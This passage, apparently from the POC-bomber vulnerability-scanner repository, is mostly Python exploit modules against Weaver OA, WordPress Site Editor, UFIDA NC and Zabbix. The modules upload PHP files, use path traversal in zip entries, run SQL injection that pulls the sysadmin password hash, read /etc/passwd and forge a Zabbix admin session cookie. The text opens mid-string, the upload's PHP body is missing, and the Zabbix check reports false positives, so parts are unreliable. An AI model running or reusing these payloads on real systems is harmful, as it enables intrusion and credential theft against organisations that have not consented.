d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a
%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1" 24 | try: 25 | requests.packages.urllib3.disable_warnings() 26 | res = requests.post(url=target, data=payload, headers=headers, verify=False, timeout=10) 27 | res.encoding = res.apparent_encoding 28 | if res.status_code == 200 and re.search(r'\[\{.+\}\]', res.text): 29 | relsult['vulnerable'] = True 30 | relsult['url'] = url 31 | relsult['method'] = 'POST' 32 | relsult['payload'] = payload 33 | relsult['about'] = 'https://zhuanlan.zhihu.com/p/86082614' 34 | return relsult 35 | else: 36 | return relsult 37 | except: 38 | return relsult 39 | 40 | -------------------------------------------------------------------------------- /pocs/web/weaver/CNVD_2021_49104.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from urllib.parse import urlparse 3 | import socket 4 | import urllib,re 5 | 6 | def verify(url): 7 | relsult = { 8 | 'name': 'CNVD-2021-49104——泛微E-Office文件上传漏洞', 9 | 'vulnerable': False 10 | } 11 | payload = b''' 12 | POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1 13 | Host: 127.0.0.1:7899 14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 15 | Accept-Encoding: gzip, deflate 16 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 17 | Connection: close 18 | Accept-Language: zh-CN,zh-TW;q=0.9,zh;q=0.8,en-US;q=0.7,en;q=0.6 19 | Cookie: LOGIN_LANG=cn; PHPSESSID=0acfd0a2a7858aa1b4110eca1404d348 20 | Content-Length: 193 21 | Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4 22 | 23 | --e64bdf16c554bbc109cecef6451c26a4 24 | 
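Content-Disposition: form-data; name="Filedata"; filename="test.php"
Content-Type: image/jpeg


--e64bdf16c554bbc109cecef6451c26a4--
'''.replace(b'\n', b'\r\n')
    # NOTE(review): the canned request declares Content-Length: 193, but the
    # file part above is empty. The PHP probe that is expected to print
    # 'PHP Version' (checked below) appears to have been stripped from this
    # listing; compare with upstream before relying on this module. Also
    # note that a successful run leaves logo-eoffice.php on the target.
    try:
        parsed = urlparse(url)
        host, _, port_text = parsed.netloc.partition(':')
        use_tls = parsed.scheme == 'https'
        port = int(port_text) if port_text else (443 if use_tls else 80)
        # The canned request names a placeholder Host; point it at the real target.
        request_bytes = payload.replace(b'Host: 127.0.0.1:7899', b'Host: ' + parsed.netloc.encode())
        with socket.create_connection((host, port), timeout=5) as raw_conn:
            conn = raw_conn
            if use_tls:
                # The original spoke plaintext to port 443, so https targets never worked.
                import ssl
                ctx = ssl.create_default_context()
                ctx.check_hostname = False
                ctx.verify_mode = ssl.CERT_NONE  # matches verify=False used across the suite
                conn = ctx.wrap_socket(raw_conn, server_hostname=host)
            conn.sendall(request_bytes)
            conn.recv(10240)  # wait for the reply so the upload is processed before we look for it
        verify_url = urllib.parse.urljoin(url, '/images/logo/logo-eoffice.php')
        req2 = requests.get(verify_url, timeout=3, verify=False)
        if req2.status_code == 200 and re.search('PHP Version', req2.text):
            relsult['vulnerable'] = True
            relsult['method'] = 'POST'
            relsult['url'] = url
            relsult['verify'] = verify_url
            relsult['about'] = 'https://blog.csdn.net/weixin_44309905/article/details/121588557'
        return relsult
    except Exception:
        return relsult

# --------------------------------------------------------------------------------
# /pocs/web/weaver/TestFile_weaver_common_ctrl_upload.zip
# (binary, see upstream: https://raw.githubusercontent.com/tr0uble-mAker/POC-bomber/d2433ac41eaa58eb4fb0876ec05e3b645e10ecd7/pocs/web/weaver/TestFile_weaver_common_ctrl_upload.zip)
# --------------------------------------------------------------------------------

# --------------------------------------------------------------------------------
# /pocs/web/weaver/e_cology_v8_sqli.py
# --------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
# Weaver OA V8 unauthenticated SQL injection: reads the sysadmin password MD5
# Fofa: app="泛微-协同办公OA"

import re
import requests
import urllib3
import urllib.parse


def verify(url):
    """Pull HrmResourceManager.password via getdata.jsp's raw `sql` parameter.

    The hash returned is credential material for the sysadmin account; it is
    stored in the result for reporting only. (Body continues on the next line.)
    """
    relsult = {
        'name': '泛微OA V8前台Sql注入',
        'vulnerable': False
    }
    target_url = urllib.parse.urljoin(url,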
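"/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager")
    headers = {
        "User-Agent": "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Mobile Safari/537.36"
    }
    # A control query: if the endpoint echoes a literal we chose, the sql
    # parameter really is executed and the first reply is not a stock page.
    check_url = urllib.parse.urljoin(url, '/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%201234%20as%20id')
    try:
        urllib3.disable_warnings()
        res = requests.get(url=target_url, headers=headers, verify=False, timeout=3)
        # Local renamed from `verify`, which shadowed this function's own name.
        control = requests.get(url=check_url, headers=headers, verify=False, timeout=3)
    except requests.RequestException:
        return relsult
    if res.status_code == 200 and 'html' not in res.text and re.search('1234', control.text):
        relsult['vulnerable'] = True
        relsult['user'] = 'sysadmin'
        relsult['MD5(password)'] = res.text.strip()
        relsult['payload'] = target_url
        relsult['about'] = 'https://blog.csdn.net/weixin_43227251/article/details/115653646'
    return relsult

# --------------------------------------------------------------------------------
# /pocs/web/weaver/weaver_common_ctrl_upload.py
# --------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
# Weaver OA weaver.common.Ctrl arbitrary file upload (zip entry path traversal)
# Fofa: app="泛微-协同办公OA"

import zipfile
import random
import os
import requests
import re
import urllib.parse
import platform

# Marker written into the uploaded file; verify() looks for it on the target.
# A successful run therefore leaves a marker .txt on the server -- clean it up.
_MARKER = "yhsnksianksxouwyqnalifhasdnslxzhdydklosicys"


def file_zip(mm, webshell_name2):
    """Write mm + '.zip' holding one entry named *webshell_name2* (a '../' traversal path).

    The context manager flushes the central directory; the original never
    closed the archive and relied on garbage collection to do it.
    """
    shell = _MARKER  # replace the content here if a different probe file is wanted
    with zipfile.ZipFile(mm + '.zip', mode='w', compression=zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(webshell_name2, shell)


def verify(urllist):
    """Upload a traversal zip through weaver.common.Ctrl and fetch the extracted marker back."""
    result = {
        'name': '泛微OA weaver.common.Ctrl 任意文件上传漏洞',
        'vulnerable': False
    }
    # os.path.join yields the same '\\' / '/' separated path the original
    # built by hand per platform.
    mm = os.path.join(os.path.abspath('.'), 'pocs', 'web', 'weaver', 'TestFile_weaver_common_ctrl_upload')
    zip_path = mm + '.zip'  # scratch archive; the original named it del_file but never deleted it
    webshell_name1 = mm + '.txt'
    # NOTE(review): mm is this machine's absolute path, so the operator's
    # local directory layout is embedded in the zip entry name and in the
    # probe URL below -- kept as upstream wrote it, but worth confirming.
    webshell_name2 = '../../../' + webshell_name1
    try:
        file_zip(mm, webshell_name2)
        # urljoin instead of string concatenation: identical when urllist ends
        # with '/', and no longer produces "hostweaver/..." when it does not.
        upload_url = urllib.parse.urljoin(urllist, 'weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp')
        with open(zip_path, 'rb') as fh:
            files = [('file1', (zip_path, fh, 'application/zip'))]
            requests.post(url=upload_url, files=files, timeout=3, verify=False)
        probe_url = urllib.parse.urljoin(urllist, 'cloudstore/' + webshell_name1)
        probe = requests.get(url=probe_url, timeout=3, verify=False)
        if probe.status_code == 200 and _MARKER in probe.text:
            result['vulnerable'] = True
            result['url'] = urllist
            result['verify'] = probe_url
            result['about'] = 'https://mp.weixin.qq.com/s/ePYRFPfu-pvWMKSiffporA, https://www.xpshuai.cn/posts/20282/'
        return result
    except Exception:
        return result
    finally:
        # Do not leave the scratch archive behind on the operator's machine.
        try:
            os.remove(zip_path)
        except OSError:
            pass

# --------------------------------------------------------------------------------
# /pocs/web/weaver/weaver_ecology_getsqldata_sqli.py
# --------------------------------------------------------------------------------
import requests
import urllib.parse


def verify(url):
    """Run `select @@version` through getSqlData; an MSSQL banner with status:true marks the target."""
    result = {
        'name': 'Weaver-E-Cology-getSqlData-sqli',
        'vulnerable': False,
        'url': url,
        'about': 'https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getSqlData%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md'
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    vurl = urllib.parse.urljoin(url, '/Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version')
    try:
        # verify=False added for consistency with the rest of the suite.
        rep = requests.get(vurl, headers=headers, timeout=3, verify=False)
    except requests.RequestException:
        return result
    if rep.status_code == 200 and 'Microsoft SQL Server' in rep.text and 'status":true' in rep.text:
        result['vulnerable'] = True
        result['verify'] = vurl
    return result

# --------------------------------------------------------------------------------
# /pocs/web/wordpress/CVE_2018_7422.py
# --------------------------------------------------------------------------------
import re
import requests
import urllib.parse


def verify(url):
    """Read /etc/passwd through the Site Editor plugin's ajax_path parameter."""
    result = {
        'name': 'CVE-2018-7422 WordPress Site Editor < 1.1.1 Local File Inclusion(LFI)',
        'vulnerable': False,
        'attack': False,
    }
    target_url = urllib.parse.urljoin(url, '/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd')
    try:
        res = requests.get(target_url, timeout=3, verify=False)
    except requests.RequestException:
        return result
    if re.search('root:x:0:0', res.text) and re.search('"success":true', res.text):
        result['vulnerable'] = True
        result['url'] = url
        result['verify'] = target_url
        result['about'] = 'https://blog.csdn.net/weixin_47311099/article/details/122854894, http://cve.scap.org.cn/vuln/VH-CVE-2018-7422'
    return result

# --------------------------------------------------------------------------------
# /pocs/web/yongyou/yongyou_nc-find-web_fileread.py
# --------------------------------------------------------------------------------
import requests
import urllib.parse
import re


def verify(url):
    """Fingerprint a UFIDA NC front page, then list the web root through /NCFindWeb."""
    result = {
        'name': '用友NC 任意文件读取(/NCFindWeb)',
        'vulnerable': False,
        'attack': False,
        'url': url,
    }
    timeout = 3
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) ",
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    vurl = urllib.parse.urljoin(url, '/NCFindWeb?service=IPreAlertConfigService&filename=/')
    try:
        rep = requests.get(url, headers=headers, timeout=timeout, verify=False)
        if rep.status_code == 200 and re.search("ufida", rep.text):
            rep2 = requests.get(vurl, headers=headers, timeout=timeout, verify=False)
            # Bug fix: the original searched the fingerprint response (rep)
            # for the .jsp listing instead of the NCFindWeb reply (rep2).
            if rep2.status_code == 200 and re.search(r".+\.jsp", rep2.text):
                result['vulnerable'] = True
                result['verify'] = vurl
        return result
    except requests.RequestException:
        return result

# --------------------------------------------------------------------------------
# /pocs/web/zabbix/CVE_2022_23131.py
# --------------------------------------------------------------------------------
import requests
import re
import base64
import urllib.parse
import json


def verify(url):
    """Forge a zbx_session cookie that claims saml_data.username_attribute = Admin.

    The anonymous session's sessionid and sign are reused unchanged; on
    affected versions the frontend trusts the unsigned saml_data.

    NOTE(review): this check never presents the forged cookie to the target.
    It reports 'vulnerable' for any Zabbix frontend that sets zbx_session,
    SAML-enabled or not, so a hit must be confirmed with the referenced PoC.
    The cookie it returns is an admin-equivalent credential if it works.
    """
    result = {
        'name': 'Zabbix SAML 未授权访问(CVE-2022-23131)',
        'vulnerable': False,
        'attack': False,
        'url': url,
        'about': 'https://github.com/Mr-xn/cve-2022-23131, https://www.secpulse.com/archives/179601.html'
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    try:
        rep = requests.get(url, timeout=3, headers=headers, verify=False)
        if rep.status_code != 200:
            return result
        # No Set-Cookie / no zbx_session: nothing to forge.
        found = re.findall("zbx_session=(.*?);", rep.headers.get("Set-Cookie") or "")
        if not found:
            return result
        session_json = json.loads(base64.b64decode(urllib.parse.unquote(found[0], encoding="utf-8")))
        forged = '{"saml_data":{"username_attribute":"Admin"},"sessionid":"%s","sign":"%s"}' % (session_json["sessionid"], session_json["sign"])
        result['vulnerable'] = True
        result['zbx_signed_session'] = urllib.parse.quote(base64.b64encode(forged.encode()))
        return result
    except Exception:
        return result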
-------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | func_timeout 3 | rich 4 | dnslib 5 | --------------------------------------------------------------------------------
